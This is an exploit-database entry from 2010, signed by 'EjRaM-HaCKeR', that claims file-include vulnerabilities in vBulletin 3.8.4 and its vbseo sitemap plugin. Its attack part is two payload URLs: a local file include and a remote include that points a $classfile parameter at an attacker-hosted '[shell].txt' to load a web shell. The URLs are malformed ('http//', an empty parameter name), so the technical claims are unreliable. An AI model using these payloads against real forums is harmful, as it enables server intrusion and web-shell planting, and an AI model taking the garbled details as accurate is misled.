id: 11145
date: 03/02/2010
title: vBulletin Version 3.8.4 File Include Vulnerability
author: EjRaM-HaCKeR
cves: 

==================================================
vBulletin Version 3.8.4 File Include Vulnerability
==================================================

##################################
# Script: vBulletin Version 3.8.4 File Include Vulnerability

#Language: $php$

#Author : $EjRaM-HaCKeR$

#My home : [ www.sec-center.com ]

#Greetz to : [Dr.eXe ,moroccoHaCkEr, All My Friends
# $ EgyptHaCkeR ]

# mail : m2z@9.cn $ tsv@hotmail.com
#################################

############# ===[ Exploits ]=== ###########
# 1-
http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI]
# 2-
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?
########################



#  0day.today [2023-03-25]  #